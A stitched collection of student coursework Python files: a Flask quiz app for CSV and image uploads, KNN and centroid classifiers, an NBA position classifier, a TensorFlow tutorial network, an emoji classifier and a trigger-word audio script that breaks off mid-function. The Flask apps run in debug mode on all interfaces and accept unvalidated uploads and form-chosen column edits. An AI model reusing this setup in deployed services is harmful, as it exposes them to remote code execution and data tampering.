area = request.form['change_area']
val = request.form['target_value']
df = pd.read_csv(curr_file, engine='python')
    df.loc[df['Name']==ppl, area] = int(val)
info = df.values.tolist()
print('bb', info, df[df['Name']==ppl][area])
df.to_csv(curr_file, index=False)
img_url = './files/'+ ppl + '.jpg'
return render_template("change_info.html", info=info, img_url=img_url)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
```
#### File: CSE6331_CloudComputing/quiz0/main.py
```python
import os
from flask import Flask, render_template, request, url_for, abort, redirect
from flask_cloudy import Storage
import pandas as pd
import math
port = int(os.getenv('PORT', 8000))
curr_file = None
app = Flask(__name__)
app.config.update({
"STORAGE_PROVIDER": "LOCAL", # Can also be S3, GOOGLE_STORAGE, etc...
"STORAGE_KEY": "",
"STORAGE_SECRET": "",
"STORAGE_CONTAINER": "./files", # a directory path for local, bucket name of cloud
"STORAGE_SERVER": True,
"STORAGE_SERVER_URL": "/files" # The url endpoint to access files on LOCAL provider
})
# Setup storage
storage = Storage()
storage.init_app(app)
@app.route("/")
def index():
csv_obj, other_obj = [], []
for obj in storage:
fname = obj.name
if fname.split('.')[-1]=='csv':
csv_obj.append(obj)
else:
other_obj.append(obj)
return render_template("index.html", csv_obj=csv_obj, other_obj=other_obj)
@app.route("/view/<path:object_name>")
def view(object_name):
obj = storage.get(object_name)
f_type = obj.name.split('.')[-1]
if f_type=='csv':
df = pd.read_csv('.'+obj.url, engine='python')
global curr_file
curr_file = '.'+obj.url
img_list = df['Picture'].values.tolist()
names = df['Name'].values.tolist()
img_urls = ['./files/'+u for u in img_list if isinstance(u, str)]
info = df.values.tolist()
elif f_type=='jpg':
info, img_urls, names = None, None, None
else:
info, img_urls, names = None, None, None
return render_template("view.html", obj=obj, info=info, img_urls=img_urls, names=names)
@app.route("/upload", methods=["POST"])
def upload():
usr_file = request.files.get("file")
my_object = storage.upload(usr_file)
return redirect(url_for("view", object_name=my_object.name))
@app.route("/people_by_grade", methods=['POST'])
def search_people_by_grade():
low = request.form['low_grade']
high = request.form['high_grade']
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if line[1] != ' ' and not math.isnan(float(line[1])):
if int(low)<=int(line[1])<=int(high):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4], line[3]])
return render_template("people_by_grade.html", grade_resp=resp)
@app.route("/people_by_room", methods=['POST'])
def search_people_by_room():
room_number = int(float(request.form['room_number']))
# print('daad', room_number, type(room_number))
df = pd.read_csv(curr_file, engine='python')
resp = []
for _, line in df.iterrows():
if not math.isnan(line[2]):
if int(line[2])==int(room_number):
if isinstance(line[4], str):
resp.append([line[0], './files/'+line[4]])
return render_template("people_by_room.html", people=resp)
@app.route("/change_info", methods=['POST'])
def change_people_info():
ppl = request.form['change_people']
area = request.form['change_area']
val = request.form['target_value']
df = pd.read_csv(curr_file, engine='python')
    df.loc[df['Name']==ppl, area] = int(val)
info = df.values.tolist()
df.to_csv(curr_file, index=False)
img_url = './files/'+ ppl + '.jpg'
return render_template("change_info.html", info=info, img_url=img_url)
if __name__ == '__main__':
app.run(host="0.0.0.0", port=port, debug=True)
``` |
{
"source": "824zzy/CSE-6363_MACHINE-LEARNING",
"score": 4
} |
#### File: CSE-6363_MACHINE-LEARNING/Project2/mainB.py
```python
import math
class KNN:
def __init__(self, K):
self.K = K
self.distances = []
self.k_neighbors = []
@staticmethod
def distance(X1, X2):
dist = 0
for (x1, x2) in zip(X1, X2):
dist += (x1 - x2) ** 2
return dist
def fit_predict(self, X_train, y_train, test_sample):
self.k_neighbors, self.distances = [], []
for X, y in zip(X_train, y_train):
d = self.distance(X, test_sample)
self.distances.append((X, y, d))
self.distances.sort(key=lambda x: x[-1]) # sort by distance
self.k_neighbors = [sample[0:-1] for sample in self.distances[0:self.K]]
label_votes={}
for neighbor in self.k_neighbors:
label = neighbor[-1]
if label in label_votes.keys():
label_votes[label] += 1
else:
label_votes[label] = 1
sorted_votes=sorted(label_votes.items(), key=lambda kv: kv[1], reverse=True) ## sorted by vote numbers
return sorted_votes[0][0]
if __name__ == "__main__":
X = [[0], [1], [2], [3]]
y = [0, 0, 1, 1]
knn = KNN(3)
pred = knn.fit_predict(X, y, [1.1])
print("Predicted class is: ", pred)
```
#### File: CSE-6363_MACHINE-LEARNING/Project2/mainD.py
```python
from mainC import onehot_convert, z_score_convert
import numpy as np
def centroid_method(X_train, y_train, X_test, y_test):
labels = np.unique(y_train)
centroids = np.zeros((X_train.shape[0], len(labels)))
y_output = []
for l in range(len(labels)):
centroids[:,l] = np.mean(X_train[:, y_train == labels[l]], axis=1)
for xt in np.transpose(X_test):
distance = np.linalg.norm(centroids - np.vstack(xt), axis=0)
y_output.append(labels[np.argmin(distance)])
score = np.mean(np.array(y_output) == y_test)
return score
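# centroid_method is a nearest-class-mean classifier: each class is summarized by the
# mean of its training columns (one centroid per label), a test sample takes the label
# of the closest centroid in Euclidean distance, and the returned score is the plain
# accuracy against y_test.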
if __name__ == "__main__":
filename = "./data/HandWrittenLetters.txt"
dataset = np.loadtxt(filename, delimiter=",")
print(dataset.shape)
X, Y = dataset[1:], dataset[0]
print(X.shape, Y.shape)
X_train, X_test = X[:, :800], X[:, 800:]
y_train, y_test = Y[:800], Y[800:]
score = centroid_method(X_train, y_train, X_test, y_test)
print("The accuracy of centroid method is: ", score)
```
#### File: Quiz2/q4/q4.py
```python
import pandas as pd
import numpy as np
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
from sklearn import svm
from sklearn.preprocessing import MinMaxScaler, OneHotEncoder
from tqdm import tqdm
pd.options.display.max_columns = None
pd.options.display.max_rows = None
np.set_printoptions(threshold=np.inf)
# Step 1: load the data file, keep Pos as the label, and drop non-feature columns
dataset = pd.read_csv("./Classification_in_NBA_data/NBA_4.txt", sep=' ')
Y = dataset['Pos']
dataset = dataset.drop(['Player', 'Tm', 'Pos'], axis=1)
print(dataset.head())
def minmax_convert(X):
scaler = MinMaxScaler()
return scaler.fit_transform(X)
def onehot_convert(X):
encoder = OneHotEncoder()
X = encoder.fit_transform(X).toarray().tolist()
return X
# Partition the dataset
dataset = minmax_convert(dataset)
X_train, y_train = [d[1:] for d in dataset[:482]], [d[0] for d in Y[:482]]
X_test = [d[1:] for d in dataset[482:]]
csv_data = pd.DataFrame(dataset)
csv_data.to_csv('./output.csv', index=False)
# KNN
import math
class KNN:
def __init__(self, K):
self.K = K
self.distances = []
self.k_neighbors = []
@staticmethod
def distance(X1, X2):
dist = 0
for (x1, x2) in zip(X1, X2):
dist += (x1 - x2) ** 2
return dist
def fit_predict(self, X_train, y_train, test_sample):
self.k_neighbors, self.distances = [], []
for X, y in zip(X_train, y_train):
d = self.distance(X, test_sample)
self.distances.append((X, y, d))
self.distances.sort(key=lambda x: x[-1]) # sort by distance
self.k_neighbors = [sample[0:-1] for sample in self.distances[0:self.K]]
label_votes={}
for neighbor in self.k_neighbors:
label = neighbor[-1]
if label in label_votes.keys():
label_votes[label] += 1
else:
label_votes[label] = 1
sorted_votes=sorted(label_votes.items(), key=lambda kv: kv[1], reverse=True) ## sorted by vote numbers
return sorted_votes[0][0]
knn = KNN(3)
pred_knn = []
for i in tqdm(range(len(X_test))):
pred_knn.append(knn.fit_predict(X_train, y_train, X_test[i]))
print("The prediction of KNN:", pred_knn)
# Centroid Method
def centroid_method(X_train, y_train, X_test):
labels = np.unique(y_train)
centroids = np.zeros((X_train.shape[0], len(labels)))
y_output = []
for l in range(len(labels)):
centroids[:,l] = np.mean(X_train[:, y_train == labels[l]], axis=1)
for xt in np.transpose(X_test):
distance = np.linalg.norm(centroids - np.vstack(xt), axis=0)
y_output.append(labels[np.argmin(distance)])
return y_output
pred_cm = centroid_method(np.array(X_train).T, np.array(y_train), np.array(X_test).T)
print("The prediction of centroid method is:", pred_cm)
## SVM: Linaer/Gaussian
clf = svm.SVC(kernel='linear')
clf.fit(X_train, y_train)
pred_svm = clf.predict(X_test)
print("The prediction of SVM:", pred_svm)
``` |
{
"source": "824zzy/Deeplearning_Homework",
"score": 4
} |
#### File: Lec2:HyperparameterTuning_Regularization_Opitimization/week3:TensorFlow_tutorial/tensorflow_tutorial.py
```python
import math
import numpy as np
import h5py
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.python.framework import ops
from utils.tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict
from tensorflow.contrib import layers
np.random.seed(1)
""" exploring the Tensorflow Library"""
# # loss function in tensorflow
# y_hat = tf.constant(36, name='y_hat')
# y = tf.constant(39, name='y')
#
# loss = tf.Variable((y-y_hat)**2, name='loss')
# # todo: https://blog.csdn.net/u012436149/article/details/78291545
# init = tf.global_variables_initializer()
#
# with tf.Session() as session:
# session.run(init)
# print "loss: " + str(session.run(loss))
# print "----------"
# session.close()
# # session
# a = tf.constant(2)
# b = tf.constant(10)
# c = tf.multiply(a, b)
# print(c)
# sess = tf.Session()
# print(sess.run(c))
# # placeholder
# x = tf.placeholder(tf.int64, name='x')
# print(sess.run(2 * x, feed_dict={x: 3}))
# print("----------")
# sess.close()
# linear function
def linear_function():
"""
Implements a linear function:
Initializes W to be a random tensor of shape (4,3)
Initializes X to be a random tensor of shape (3,1)
Initializes b to be a random tensor of shape (4,1)
Returns:
result -- runs the session for Y = WX + b
"""
np.random.seed(1)
X = tf.constant(np.random.randn(3, 1), name="X")
W = tf.constant(np.random.randn(4, 3), name="W")
    b = tf.constant(np.random.randn(4, 1), name="b")
Y = tf.add(tf.matmul(W, X), b)
# Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate
sess = tf.Session()
result = sess.run(Y)
return result
# # test case for linear_function
# print("result = " + str(linear_function()))
# computing the sigmoid
def sigmoid(z):
"""
Computes the sigmoid of z
Arguments:
z -- input value, scalar or vector
Returns:
results -- the sigmoid of z
"""
# Create a placeholder for x. Name it 'x'.
x = tf.placeholder(tf.float32, name="x")
# compute sigmoid(x)
sigmoid = tf.sigmoid(x)
# Create a session, and run it. Please use the method 2 explained above.
# You should use a feed_dict to pass z's value to x.
with tf.Session() as sess:
# Run session and call the output "result"
result = sess.run(sigmoid, feed_dict={x: z})
return result
# # test case for sigmoid
# print ("sigmoid(0) = " + str(sigmoid(0)))
# print ("sigmoid(12) = " + str(sigmoid(12)))
# compute the cost
def cost(logits, labels):
"""
Computes the cost using the sigmoid cross entropy
Arguments:
logits -- vector containing z, output of the last linear unit (before the final sigmoid activation)
labels -- vector of labels y (1 or 0)
Note: What we've been calling "z" and "y" in this class are respectively called "logits" and "labels"
in the TensorFlow documentation. So logits will feed into z, and labels into y.
Returns:
cost -- runs the session of the cost (formula (2))
"""
# Create the placeholders for "logits" (z) and "labels" (y) (approx. 2 lines)
z = tf.placeholder(tf.float32, name="z")
y = tf.placeholder(tf.float32, name="y")
# Use the loss function (approx. 1 line)
cost = tf.nn.sigmoid_cross_entropy_with_logits(logits=z, labels=y)
# Create a session (approx. 1 line). See method 1 above.
sess = tf.Session()
# Run the session (approx. 1 line).
cost = sess.run(cost, feed_dict={z: logits, y: labels})
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return cost
# # test case for cost
# logits = sigmoid(np.array([0.2, 0.4, 0.7, 0.9]))
# cost = cost(logits, np.array([0, 0, 1, 1]))
# print ("cost = " + str(cost))
# Using One Hot encodings
def one_hot_matrix(labels, C):
"""
Creates a matrix where the i-th row corresponds to the ith class number and the jth column
corresponds to the jth training example. So if example j had a label i. Then entry (i,j)
will be 1.
Arguments:
labels -- vector containing the labels
C -- number of classes, the depth of the one hot dimension
Returns:
one_hot -- one hot matrix
"""
# Create a tf.constant equal to C (depth), name it 'C'. (approx. 1 line)
C = tf.constant(C, name="C")
# Use tf.one_hot, be careful with the axis (approx. 1 line)
one_hot_matrix = tf.one_hot(labels, C, axis=0)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session (approx. 1 line)
one_hot = sess.run(one_hot_matrix)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return one_hot
# # test case for one-hot vector
# labels = np.array([1, 2, 3, 0, 2, 1])
# one_hot = one_hot_matrix(labels, C=4)
# print ("one_hot = " + str(one_hot))
## Initialize with Zeros and Ones
def ones(shape):
"""
Creates an array of ones of dimension shape
Arguments:
shape -- shape of the array you want to create
Returns:
ones -- array containing only ones
"""
# Create "ones" tensor using tf.ones(...). (approx. 1 line)
ones = tf.ones(shape)
# Create the session (approx. 1 line)
sess = tf.Session()
# Run the session to compute 'ones' (approx. 1 line)
ones = sess.run(ones)
# Close the session (approx. 1 line). See method 1 above.
sess.close()
return ones
# # test case for ones
# print ("ones = " + str(ones([3])))
""" Building your first neural network in Tensorflow """
# SIGNS Dataset: teach our computers to decipher sign language.
# Training set: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).
# Test set: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).
# Loading the dataset
X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()
# # show Example of a picture
# index = 0
# plt.imshow(X_train_orig[index])
# plt.show()
# print ("y = " + str(np.squeeze(Y_train_orig[:, index])))
# Flatten the training and test images
X_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T
X_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T
# Normalize image vectors
X_train = X_train_flatten/255.
X_test = X_test_flatten/255.
# Convert training and test labels to one hot matrices
Y_train = convert_to_one_hot(Y_train_orig, 6)
Y_test = convert_to_one_hot(Y_test_orig, 6)
# # test case for datasets
# print ("number of training examples = " + str(X_train.shape[1]))
# print ("number of test examples = " + str(X_test.shape[1]))
# print ("X_train shape: " + str(X_train.shape))
# print ("Y_train shape: " + str(Y_train.shape))
# print ("X_test shape: " + str(X_test.shape))
# print ("Y_test shape: " + str(Y_test.shape))
""" The model is LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX. """
# create placeholders
def create_placeholders(n_x, n_y):
"""
Creates the placeholders for the tensorflow session.
Arguments:
n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)
n_y -- scalar, number of classes (from 0 to 5, so -> 6)
Returns:
X -- placeholder for the data input, of shape [n_x, None] and dtype "float"
Y -- placeholder for the input labels, of shape [n_y, None] and dtype "float"
Tips:
- You will use None because it let's us be flexible on the number of examples you will for the placeholders.
In fact, the number of examples during test/train is different.
"""
X = tf.placeholder(tf.float32, [n_x, None])
Y = tf.placeholder(tf.float32, [n_y, None])
return X, Y
# # test case for create placeholder
# X, Y = create_placeholders(12288, 6)
# print ("X = " + str(X))
# print ("Y = " + str(Y))
# initializing the parameters
def initialize_parameters():
"""
Initializes parameters to build a neural network with tensorflow. The shapes are:
W1 : [25, 12288]
b1 : [25, 1]
W2 : [12, 25]
b2 : [12, 1]
W3 : [6, 12]
b3 : [6, 1]
Returns:
parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3
"""
tf.set_random_seed(1) # so that your "random" numbers match ours
    # note: tf.contrib.layers.xavier_initializer(seed=1) is accessed here through the "from tensorflow.contrib import layers" import above
W1 = tf.get_variable(name="W1", shape=[25, 12288], initializer=layers.xavier_initializer(seed=1))
b1 = tf.get_variable(name="b1", shape=[25, 1], initializer=tf.zeros_initializer())
W2 = tf.get_variable(name="W2", shape=[12, 25], initializer=layers.xavier_initializer(seed=1))
b2 = tf.get_variable(name="b2", shape=[12, 1], initializer=tf.zeros_initializer())
W3 = tf.get_variable(name="W3", shape=[6, 12], initializer=layers.xavier_initializer(seed=1))
b3 = tf.get_variable(name="b3", shape=[6, 1], initializer=tf.zeros_initializer())
parameters = {"W1": W1,
"b1": b1,
"W2": W2,
"b2": b2,
"W3": W3,
"b3": b3}
return parameters
# test case for init param
# tf.reset_default_graph()
# with tf.Session() as sess:
# parameters = initialize_parameters()
# print("W1 = " + str(parameters["W1"]))
# print("b1 = " + str(parameters["b1"]))
# print("W2 = " + str(parameters["W2"]))
# print("b2 = " + str(parameters["b2"]))
# Forward propagation in tensorflow
def forward_propagation(X, parameters):
"""
Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX
Arguments:
X -- input dataset placeholder, of shape (input size, number of examples)
parameters -- python dictionary containing your parameters "W1", "b1", "W2", "b2", "W3", "b3"
the shapes are given in initialize_parameters
Returns:
Z3 -- the output of the last LINEAR unit
"""
# Retrieve the parameters from the dictionary "parameters"
W1 = parameters['W1']
b1 = parameters['b1']
W2 = parameters['W2']
b2 = parameters['b2']
W3 = parameters['W3']
b3 = parameters['b3']
# Numpy Equivalents:
Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1
A1 = tf.nn.relu(Z1) # A1 = relu(Z1)
Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, a1) + b2
A2 = tf.nn.relu(Z2) # A2 = relu(Z2)
Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3,A2) + b3
return Z3
# # test case for forward prop
# tf.reset_default_graph()
#
# with tf.Session() as sess:
# X, Y = create_placeholders(12288, 6)
# parameters = initialize_parameters()
# Z3 = forward_propagation(X, parameters)
# print("Z3 = " + str(Z3))
# compute cost
def compute_cost(Z3, Y):
"""
Computes the cost
Arguments:
Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)
Y -- "true" labels vector placeholder, same shape as Z3
Returns:
cost - Tensor of the cost function
"""
# to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)
logits = tf.transpose(Z3)
labels = tf.transpose(Y)
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))
return cost
# # test case for cost
# tf.reset_default_graph()
#
# with tf.Session() as sess:
# X, Y = create_placeholders(12288, 6)
# parameters = initialize_parameters()
# Z3 = forward_propagation(X, parameters)
# cost = compute_cost(Z3, Y)
# print("cost = " + str(cost))
# backward propagation & parameter updates
def model(X_train, Y_train, X_test, Y_test, learning_rate=0.0001,
num_epochs=1500, minibatch_size=32, print_cost=True):
"""
Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.
Arguments:
X_train -- training set, of shape (input size = 12288, number of training examples = 1080)
Y_train -- test set, of shape (output size = 6, number of training examples = 1080)
X_test -- training set, of shape (input size = 12288, number of training examples = 120)
Y_test -- test set, of shape (output size = 6, number of test examples = 120)
learning_rate -- learning rate of the optimization
num_epochs -- number of epochs of the optimization loop
minibatch_size -- size of a minibatch
print_cost -- True to print the cost every 100 epochs
Returns:
parameters -- parameters learnt by the model. They can then be used to predict.
"""
ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables
tf.set_random_seed(1) # to keep consistent results
seed = 3 # to keep consistent results
(n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)
n_y = Y_train.shape[0] # n_y : output size
costs = [] # To keep track of the cost
# Create Placeholders of shape (n_x, n_y)
X, Y = create_placeholders(n_x, n_y)
# Initialize parameters
parameters = initialize_parameters()
# Forward propagation: Build the forward propagation in the tensorflow graph
Z3 = forward_propagation(X, parameters)
# Cost function: Add cost function to tensorflow graph
cost = compute_cost(Z3, Y)
# Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Initialize all the variables
init = tf.global_variables_initializer()
# Start the session to compute the tensorflow graph
with tf.Session() as sess:
# Run the initialization
sess.run(init)
# Do the training loop
for epoch in range(num_epochs):
epoch_cost = 0. # Defines a cost related to an epoch
num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set
seed = seed + 1
minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)
for minibatch in minibatches:
# Select a minibatch
(minibatch_X, minibatch_Y) = minibatch
# IMPORTANT: The line that runs the graph on a minibatch.
# Run the session to execute the "optimizer" and the "cost", the feedict should contain a minibatch for (X,Y).
_, minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})
epoch_cost += minibatch_cost / num_minibatches
# Print the cost every epoch
if print_cost == True and epoch % 100 == 0:
print ("Cost after epoch %i: %f" % (epoch, epoch_cost))
if print_cost == True and epoch % 5 == 0:
costs.append(epoch_cost)
# plot the cost
plt.plot(np.squeeze(costs))
plt.ylabel('cost')
plt.xlabel('iterations (per tens)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
# lets save the parameters in a variable
parameters = sess.run(parameters)
print ("Parameters have been trained!")
# Calculate the correct predictions
correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
print ("Train Accuracy:", accuracy.eval({X: X_train, Y: Y_train}))
print ("Test Accuracy:", accuracy.eval({X: X_test, Y: Y_test}))
return parameters
# # test case for model
# parameters = model(X_train, Y_train, X_test, Y_test)
```
#### File: week2:NLP_and_Word Embedding/Emojify/emojifier_V1_main.py
```python
import numpy as np
from emo_utils import *
import emoji
import matplotlib.pyplot as plt
""" Baseline model: Emojifier-V1 """
X_train, Y_train = read_csv('data/train_emoji.csv')
X_test, Y_test = read_csv('data/tesss.csv')
maxLen = len(max(X_train, key=len).split())
# # test case for data
# index = 1
# print(X_train[index], label_to_emoji(Y_train[index]))
Y_oh_train = convert_to_one_hot(Y_train, C=5)
Y_oh_test = convert_to_one_hot(Y_test, C=5)
# # test case for one-hot data
# index = 50
# print(Y_train[index], "is converted into one hot", Y_oh_train[index])
# implementing emojifier V1
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs('data/glove.6B.50d.txt')
# # test case for word to vec map
# word = "cucumber"
# index = 289846
# print("the index of", word, "in the vocabulary is", word_to_index[word])
# print("the", str(index) + "th word in the vocabulary is", index_to_word[index])
# sentence to avg
def sentence_to_avg(sentence, word_to_vec_map):
"""
Converts a sentence (string) into a list of words (strings). Extracts the GloVe representation of each word
and averages its value into a single vector encoding the meaning of the sentence.
Arguments:
sentence -- string, one training example from X
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
Returns:
avg -- average vector encoding information about the sentence, numpy-array of shape (50,)
"""
# Step 1: Split sentence into list of lower case words (≈ 1 line)
words = (sentence.lower()).split()
# Initialize the average word vector, should have the same shape as your word vectors.
avg = np.zeros(50)
# Step 2: average the word vectors. You can loop over the words in the list "words".
for w in words:
avg += word_to_vec_map[w]
avg = avg / len(words)
return avg
# # test case for sentence to avg
# avg = sentence_to_avg("Morrocan couscous is my favorite dish", word_to_vec_map)
# print("avg = ", avg)
# model
def model(X, Y, word_to_vec_map, learning_rate=0.01, num_iterations=400):
"""
Model to train word vector representations in numpy.
Arguments:
X -- input data, numpy array of sentences as strings, of shape (m, 1)
Y -- labels, numpy array of integers between 0 and 7, numpy-array of shape (m, 1)
word_to_vec_map -- dictionary mapping every word in a vocabulary into its 50-dimensional vector representation
learning_rate -- learning_rate for the stochastic gradient descent algorithm
num_iterations -- number of iterations
Returns:
pred -- vector of predictions, numpy-array of shape (m, 1)
W -- weight matrix of the softmax layer, of shape (n_y, n_h)
b -- bias of the softmax layer, of shape (n_y,)
"""
np.random.seed(1)
# Define number of training examples
m = Y.shape[0] # number of training examples
n_y = 5 # number of classes
n_h = 50 # dimensions of the GloVe vectors
# Initialize parameters using Xavier initialization
W = np.random.randn(n_y, n_h) / np.sqrt(n_h)
b = np.zeros((n_y,))
# Convert Y to Y_onehot with n_y classes
Y_oh = convert_to_one_hot(Y, C=n_y)
# Optimization loop
for t in range(num_iterations): # Loop over the number of iterations
for i in range(m): # Loop over the training examples
# Average the word vectors of the words from the j'th training example
avg = sentence_to_avg(X[i], word_to_vec_map)
# Forward propagate the avg through the softmax layer
z = np.dot(W, avg) + b
a = softmax(z)
# Compute cost using the j'th training label's one hot representation and "A" (the output of the softmax)
cost = -np.sum(Y_oh[i] * np.log(a))
# Compute gradients
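            # For a softmax output trained with cross-entropy, dJ/dz simplifies to
            # (a - y_one_hot); dW is then the outer product of that error with the
            # averaged word vector, and db equals the error itself.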
dz = a - Y_oh[i]
dW = np.dot(dz.reshape(n_y, 1), avg.reshape(1, n_h))
db = dz
# Update parameters with Stochastic Gradient Descent
W = W - learning_rate * dW
b = b - learning_rate * db
if t % 100 == 0:
print("Epoch: " + str(t) + " --- cost = " + str(cost))
pred = predict(X, Y, W, b, word_to_vec_map)
return pred, W, b
# # test case for model V1
# print(X_train.shape)
# print(Y_train.shape)
# print(np.eye(5)[Y_train.reshape(-1)].shape)
# print(X_train[0])
# print(type(X_train))
# Y = np.asarray([5, 0, 0, 5, 4, 4, 4, 6, 6, 4, 1, 1, 5, 6, 6, 3, 6, 3, 4, 4])
# print(Y.shape)
#
# X = np.asarray(['I am going to the bar tonight', 'I love you', 'miss you my dear',
# 'Lets go party and drinks','Congrats on the new job','Congratulations',
# 'I am so happy for you', 'Why are you feeling bad', 'What is wrong with you',
# 'You totally deserve this prize', 'Let us go play football',
# 'Are you down for football this afternoon', 'Work hard play harder',
# 'It is suprising how people can be dumb sometimes',
# 'I am very disappointed','It is the best day in my life',
# 'I think I will end up alone','My life is so boring','Good job',
# 'Great so awesome'])
#
# print(X.shape)
# print(np.eye(5)[Y_train.reshape(-1)].shape)
# print(type(X_train))
# # train your model and examining test set performance
# pred, W, b = model(X_train, Y_train, word_to_vec_map)
# print(pred)
# print("Training set:")
# pred_train = predict(X_train, Y_train, W, b, word_to_vec_map)
# print('Test set:')
# pred_test = predict(X_test, Y_test, W, b, word_to_vec_map)
#
#
# X_my_sentences = np.array(["i adore you", "i love you", "funny lol", "lets play with a ball", "food is ready", "not feeling happy"])
# Y_my_labels = np.array([[0], [0], [2], [1], [4],[3]])
#
# pred = predict(X_my_sentences, Y_my_labels , W, b, word_to_vec_map)
# print_predictions(X_my_sentences, pred)
#
# print(Y_test.shape)
# print(' '+ label_to_emoji(0)+ ' ' + label_to_emoji(1) + ' ' + label_to_emoji(2)+ ' ' + label_to_emoji(3)+' ' + label_to_emoji(4))
# print(pd.crosstab(Y_test, pred_test.reshape(56,), rownames=['Actual'], colnames=['Predicted'], margins=True))
# plot_confusion_matrix(Y_test, pred_test)
```
#### File: week3:Sequence_models_and_Attention_mechanism/Trigger word detection/Trigger_Word_Detection_main.py
```python
import numpy as np
# todo: pydub package to manipulate audio: Pydub converts raw audio files into lists of Pydub data structures
from pydub import AudioSegment
import random
import sys
import io
import os
import glob
from td_utils import *
from keras.callbacks import ModelCheckpoint
from keras.models import Model, load_model, Sequential
from keras.layers import Dense, Activation, Dropout, Input, Masking, TimeDistributed, LSTM, Conv1D
from keras.layers import GRU, Bidirectional, BatchNormalization, Reshape
from keras.optimizers import Adam
""" Data synthesis: Creating a speech dataset """
# From audio recordings to spectrograms
x = graph_spectrogram("audio_examples/example_train.wav")
_, data = wavfile.read("audio_examples/example_train.wav")
# test case for data loading
# print("Time steps in audio recording before spectrogram", data[:,0].shape)
# print("Time steps in input after spectrogram", x.shape)
# parameters defination
Tx = 5511 # The number of time steps input to the model from the spectrogram
n_freq = 101 # Number of frequencies input to the model at each time step of the spectrogram
Ty = 1375 # The number of time steps in the output of our model
# Generating a single training example
# Load audio segments using pydub
activates, negatives, backgrounds = load_raw_audio()
# # test case for audio loading
# print("background len: " + str(len(backgrounds[0]))) # Should be 10,000, since it is a 10 sec clip
# print("activate[0] len: " + str(len(activates[0]))) # Maybe around 1000, since an "activate" audio clip is usually around 1 sec (but varies a lot)
# print("activate[1] len: " + str(len(activates[1]))) # Different "activate" clips can have different lengths
# help functions: get random time segment and is_overlapping
def get_random_time_segment(segment_ms):
"""
Gets a random time segment of duration segment_ms in a 10,000 ms audio clip.
Arguments:
segment_ms -- the duration of the audio clip in ms ("ms" stands for "milliseconds")
Returns:
segment_time -- a tuple of (segment_start, segment_end) in ms
"""
segment_start = np.random.randint(low=0, high=10000 - segment_ms) # Make sure segment doesn't run past the 10sec background
segment_end = segment_start + segment_ms - 1
return segment_start, segment_end
def is_overlapping(segment_time, previous_segments):
"""
Checks if the time of a segment overlaps with the times of existing segments.
Arguments:
segment_time -- a tuple of (segment_start, segment_end) for the new segment
previous_segments -- a list of tuples of (segment_start, segment_end) for the existing segments
Returns:
True if the time segment overlaps with any of the existing segments, False otherwise
"""
segment_start, segment_end = segment_time
# Step 1: Initialize overlap as a "False" flag. (≈ 1 line)
overlap = False
# Step 2: loop over the previous_segments start and end times.
# Compare start/end times and set the flag to True if there is an overlap (≈ 3 lines)
for previous_start, previous_end in previous_segments:
        if segment_start <= previous_end and segment_end >= previous_start:
overlap = True
return overlap
# # test case for overlapping
# overlap1 = is_overlapping((950, 1430), [(2000, 2550), (260, 949)])
# overlap2 = is_overlapping((2305, 2950), [(824, 1532), (1900, 2305), (3424, 3656)])
# print("Overlap 1 = ", overlap1)
# print("Overlap 2 = ", overlap2)
# insert audio clip
def insert_audio_clip(background, audio_clip, previous_segments):
"""
Insert a new audio segment over the background noise at a random time step, ensuring that the
audio segment does not overlap with existing segments.
Arguments:
background -- a 10 second background audio recording.
audio_clip -- the audio clip to be inserted/overlaid.
previous_segments -- times where audio segments have already been placed
Returns:
new_background -- the updated background audio
"""
# Get the duration of the audio clip in ms
segment_ms = len(audio_clip)
# Step 1: Use one of the helper functions to pick a random time segment onto which to insert
# the new audio clip. (≈ 1 line)
segment_time = get_random_time_segment(segment_ms)
# Step 2: Check if the new segment_time overlaps with one of the previous_segments. If so, keep
# picking new segment_time at random until it doesn't overlap. (≈ 2 lines)
while is_overlapping(segment_time, previous_segments):
segment_time = get_random_time_segment(segment_ms)
# Step 3: Add the new segment_time to the list of previous_segments (≈ 1 line)
previous_segments.append(segment_time)
